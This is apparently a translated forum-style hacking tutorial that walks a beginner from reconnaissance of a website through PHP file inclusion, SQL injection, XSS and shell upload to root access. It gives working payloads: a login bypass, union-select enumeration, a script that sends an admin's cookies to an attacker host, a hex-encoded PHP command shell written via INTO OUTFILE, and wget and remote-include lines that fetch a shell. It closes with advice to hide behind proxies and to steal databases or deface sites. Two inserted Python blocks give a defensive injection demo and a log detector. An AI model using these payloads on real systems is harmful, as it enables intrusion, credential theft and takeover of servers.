Hacker
Part 1. PRELIMINARY EXAMINATION OF THE "PATIENT".
Chapter 1. Static or Dynamic?
Let's say we have a website _www.xxx.com. The first thing to do is to view its content.
There are two types of sites: those with static content and those with dynamic content. The second type is more common, because with static content every new page has to be created by hand, which is a lot of work when you need a hundred of them. The first type is used either by beginners (for a personal page) or by highly protected companies that want to shield themselves from most hacking techniques, though, as they say, nobody is fully insured. The second type is preferable for us, because with dynamic content it is hard for the owner to keep track of every error that appears.
So, let's see which pages are present. Static content is characterized by pages with the extensions *.htm and *.html (but this is not always the case, because PHP or ASP scripts can be served under an .html extension). You can recognize static pages by their small number, the absence of parameters in the address bar, and direct links to other pages. Dynamic sites are characterized by the extensions *.php, *.phtml, *.php3, *.asp, *.aspx, *.jsp, which belong to scripting languages.
Example: The site _http://www.xxx.com has 5 pages: index.html, masha.html, pasha.html, ih_lubov.html, about.htm. This site is most likely static... but a page like _http://www.yyy.com/index.html?page=sasha.html indicates that the site is dynamic.
Chapter 2. Who else is there?
It is possible that the site under review consists of only 3-4 static pages and there is no way to find errors in them. In this case, the fact that several sites can be hosted on the same server may help us. Some of them may have dynamic content or openly accessible admin panels (which is very rare). Special services will help you find such neighbors on <url>. Here are the addresses of three of them:
DOMAINSDB.NET - Reverse IP & NS Lookup Tool (DomainsDB.net)
Next, you can check the server for other services, such as FTP, Telnet, SSH, and HTTPS (secure HTTP). Sometimes the admin has completely protected the web content but forgotten about the FTP service and left it open.
Example: The site _http://www.xxx.com is well protected, but another site, _http://www.yyy.com, sits on the same IP (as we learned from the aforementioned services). It is also well protected, but by typing _ftp://www.yyy.com in the address bar we can see all the site's content and can upload a shell (a special script that allows you to execute various commands on the server). In general, uploading a shell is the penultimate step in getting full access to the server.
Chapter 3. Closer to the body.
So, knowing a lot about the site, what else can you do? You can scan the "hidden" content of the site to get the necessary information. Many admins want their brainchild to be popular, so they try in every possible way to attract search engines. This is done so that a person looking for information reaches the site through search servers (yandex.ru, rambler.ru, google.com, msn.com). These systems have their own "information gatherers", robots that follow all the links, write everything down somewhere, and then serve it up when you click the SEARCH button. To keep these robots out of places they shouldn't go, admins often create a special file in the root of the site with instructions for the bot. It's called robots.txt. Sometimes you can find a lot of interesting information in it.
You can also scan the entire site using special tools such as NIKTO, XSpider, and others (all of them can be found on the Internet). They will help you find hidden files and folders.
Example: At _http://www.xxx.com/robots.txt we can see that the /forum folder exists, although there is no mention of it on the site itself. Go to _http://www.xxx.com/forum and find a freshly installed forum, and after running a scanner over the site we find an admin panel without authorization at _http://www.xxx.com/admin.
Part 2. ATTACK.
Chapter 1. Before the attack.
When viewing a site, an experienced eye will always notice whether it is self-made or built on some popular engine. For these engines almost all vulnerabilities are known (with the exception of so-called private sploits, which are known only to a narrow circle of people and cost a lot of money). A beginner should pay attention to the following things:
- The inscription "Powered by xxxxxxxx" says that the engine is called xxxxxxxx;
- The layout style is the same as that of the yyyyyyy engine;
- The script names are the same as those of the zzzzzzz engine.
If you work out which engine runs the site, then you either need to look for vulnerabilities yourself by downloading the same engine, or, if you don't have enough knowledge, use specialized sites such as XakNet.ru, AntiChat.ru, SecurityLab.ru, milw0rm.com. Their special sections hold information about almost all the vulnerabilities of well-known engines, and also sploits, special scripts that hack the site automatically (they are usually used either by beginners out of ignorance or by pros to simplify the process). For self-written sites there are several types of attacks on web content; the most common ones are:
- PHP injections;
- SQL injections;
- XSS attacks.
Chapter 2. PHP-injection.
PHP injection is a type of attack in which the attacker makes the script output a page of his choosing instead of the intended one. This vulnerability is typical for sites whose address bar looks something like this: _http://www.xxx.com/index.php?page=sasha.php. This is the ideal case of PHP injection, in which the script (in most cases) checks neither the file name nor its extension. There are also injections in which the script appends the file extension itself: _http://www.xxx.com/index.php?page=sasha will display the page sasha.html.
Chapter 3. SQL injection.
Many sites store important information in databases; MySQL and MSSQL are considered the most popular on the Internet. The site sends queries to the database, the database returns a response, and the script presents it to the user in the desired format. So, if we change the query in some way, we can get the result we need. You can check for SQL injection by substituting the "'" character into a parameter, since in databases it delimits string values: if there is an address _http://www.xxx.com/index.php?id=365 and we put ' after the parameter 365 - _http://www.xxx.com/index. - and get an error instead of the information on screen, this indicates the presence of SQL injection. What happens next depends on the type and version of the database. I will not describe all the subspecies of SQL attacks here, because the article would immediately grow considerably, but I will be happy to tell you where to read about it in detail, because there are many articles on this type of vulnerability.
Example: The site's address bar looks like this: _http://www.xxx.com/index.php?id=365. We substitute ' - _http://www.xxx.com/index.php?id=365' - and get an error like "MySQL Error: ...". We find the number of columns using +order+by+XX/*, where XX is the column number to try:
_http://www.xxx.com/index.php?id=365 order by 50/* - there is an error…
_http://www.xxx.com/index.php?id=365 order by 25/* - there is an error…
_http://www.xxx.com/index.php?id=365 order by 15/* - no error, so the number of columns is between 15 and 25. Then, in the same way, we find that the number of columns is 16.
_http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* - outputs 2,4,6,8,15. Substituting user(), version(), database() in place of the output numbers, we get the user, version, and name of the database in use.
What follows depends on the data we want to get… Also, if a database is used to log in to closed sections of the site, we can bypass authorization by using a construct like ' or 1=1/*, substituting it for the username and password.
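As an added illustration (not part of the original post), here is the concatenated login query that the ' or 1=1/* bypass above relies on, beside a parameterized version that treats the same input as plain data, plus the quote probe from the start of the chapter. It uses Python's sqlite3 in memory instead of the MySQL the post discusses, and the users table and credentials are constructed for the demo:

```python
import sqlite3

BYPASS = "' or 1=1/*"   # the authorization-bypass input described in the post


def make_db():
    # Constructed in-memory stand-in for the site's users table
    # (sqlite3 is used only so the example runs without a database server).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")
    return db


def login_vulnerable(db, name, password):
    # The query is assembled by string concatenation, the pattern the post's
    # "'" probe and "' or 1=1/*" bypass rely on: the quote in the input closes
    # the string literal, "or 1=1" makes the WHERE clause always true and "/*"
    # comments out the rest of the statement.
    query = ("SELECT COUNT(*) FROM users WHERE name='" + name
             + "' AND pass='" + password + "'")
    return db.execute(query).fetchone()[0] > 0


def login_hardened(db, name, password):
    # Placeholders pass the values to the driver separately from the SQL text,
    # so quotes and comment sequences in the input are only ever data.
    query = "SELECT COUNT(*) FROM users WHERE name=? AND pass=?"
    return db.execute(query, (name, password)).fetchone()[0] > 0


def quote_probe_errors(db, user_id):
    # The post's first test: append a single quote to a numeric parameter and
    # see whether the database complains. Returns True when the concatenated
    # query fails to parse, the "MySQL Error: ..." signal the post describes;
    # a site that echoes such errors confirms the injection point for free.
    try:
        db.execute("SELECT name FROM users WHERE rowid=" + user_id).fetchall()
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with bypass input:", login_vulnerable(db, BYPASS, BYPASS))
    print("hardened login with bypass input:  ", login_hardened(db, BYPASS, BYPASS))
    print("quote probe on id=365':", quote_probe_errors(db, "365'"))
```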
Chapter 4. XSS attack.
This type of attack is used to get the admin's cookies. If you enter a construct like <script>alert('Admin-FUCK')</script> in a field such as "FULL NAME" in the guestbook, then view your entry, and a window with the text "Admin-FUCK" appears on the screen, this indicates the presence of an XSS vulnerability. If you insert special code instead, then when the admin views this message, his cookies will arrive at your sniffer, and they contain the password or its hash, or the session…
Example: The site _http://www.xxx.com has a guestbook whose name field is subject to XSS: insert <script>alert('Admin-FUCK');</script> in this field and see "Admin-FUCK" on the screen. Now insert <script>img = new Image(); img.src="http://hacker.ru/snf.jpg?"+document.cookie;</script> and wait for the admin to view your entry... After a while we get the MD5 hash of his password on the sniffer. We crack it on http://HashCracking.info or similar services. Then go to the admin panel…
Part 3. SHELL, ROOT.
Chapter 1. Shell-shell-la-fam.
So, we are in the admin panel, or we have root access to the database, or a PHP injection that includes a remote file, or FTP access to the site; what's next? From here it gets simpler:
1) FTP access or ADMIN PANEL. Just upload the shell script you like and go to the next chapter.
2) PHP injection. We upload the shell script to some free hosting service, for example narod.ru, and include it something like this: _http://www.xxx.com/index.php?page=http://site.narod.ru/shell.php, then upload the shell directly to the site.
3) Root MySQL. If the quotation mark is not filtered, you can write the shell with the query _http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8,0x3C3F2073797374656D28245F4745545B2763275D293B203F3E,10,11,12,13,14,15,16+FROM+mysql.user+INTO+OUTFILE+'/home/www/shell.php'/*, where 0x3C3F2073797374656D28245F4745545B2763275D293B203F3E is the hex-encoded expression <? system($_GET['c']); ?>, which allows executing commands on the server. Next, fetch a more convenient shell with the command _http://www.xxx.com?c=wget -O shell.php _http://site.narod.ru/shell.php.
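The requests walked through in the PHP-injection, SQL-injection and XSS chapters and in the shell chapter above all leave recognizable traces in the web server's access log. The following detector is an added example, not from the original post; the log lines and the 10.0.0.x client addresses are constructed to mirror those requests:

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed common-log-format lines mirroring the requests the post walks
# through (quote probe, order by, union select ... into outfile, remote include,
# script tag in a guestbook field). They are not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0300] "GET /index.php?id=365 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2009:10:00:01 +0300] "GET /index.php?id=365%27 HTTP/1.1" 500 312',
    '10.0.0.5 - - [01/Jan/2009:10:00:02 +0300] "GET /index.php?id=365+order+by+15/* HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2009:10:00:03 +0300] "GET /index.php?id=-1+union+select+1,2,3+from+mysql.user+into+outfile+%27/home/www/shell.php%27/* HTTP/1.1" 200 80',
    '10.0.0.5 - - [01/Jan/2009:10:00:04 +0300] "GET /index.php?page=http://site.narod.ru/shell.php HTTP/1.1" 200 80',
    '10.0.0.7 - - [01/Jan/2009:10:00:05 +0300] "GET /guestbook.php?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 80',
    '10.0.0.9 - - [01/Jan/2009:10:00:06 +0300] "GET /index.php?page=about HTTP/1.1" 200 4096',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \d+$'
)

# Each rule is (tag, predicate over one URL-decoded parameter value).
RULES = [
    ("sqli-quote-on-numeric", lambda v: re.fullmatch(r"-?\d+'", v) is not None),
    ("sqli-order-by", lambda v: re.search(r"\border\s+by\s+\d+", v, re.I) is not None),
    ("sqli-union-select", lambda v: re.search(r"\bunion\s+(all\s+)?select\b", v, re.I) is not None),
    ("sqli-into-outfile", lambda v: re.search(r"\binto\s+outfile\b", v, re.I) is not None),
    ("rfi-remote-include", lambda v: re.match(r"(https?|ftp)://", v, re.I) is not None),
    ("xss-script-tag", lambda v: "<script" in v.lower()),
]


def decoded_params(target):
    # parse_qsl turns '+' into spaces and %XX escapes back into characters,
    # so the rules see what the PHP script would have seen in $_GET.
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan(lines):
    """Return one (line_no, client_ip, param, tag, status) tuple per rule hit."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real detector would count these too
        for param, value in decoded_params(m.group("target")):
            for tag, pred in RULES:
                if pred(value):
                    hits.append((line_no, m.group("ip"), param, tag, m.group("status")))
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

A 500 status on the quote-probe line is the "error instead of the page" signal the SQL-injection chapter describes, so the status is kept in each hit; several hits from one client in a short window, as here, are what to alert on.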
Chapter 2. Root.
With the shell uploaded, we can now execute commands on the server, and the first command will be id, which shows your rights in the system; they are usually modest. If you want more, look at which OS is running on the server (the uname -a command). For that version we look for a sploit on the site, compile it, run it (how to do this is described either at the top of the sploit itself or in articles), and root! Goal achieved.
Part 4. ARE YOU SAFE?
Every crime is punishable, so you need to protect yourself in advance: proxies should become your best friends. Read about it, don't be lazy…
Part 5. BONUS.
What you do next, whether you just take the database, deface the site, drive traffic, or maybe set up a proxy for users, is up to you.
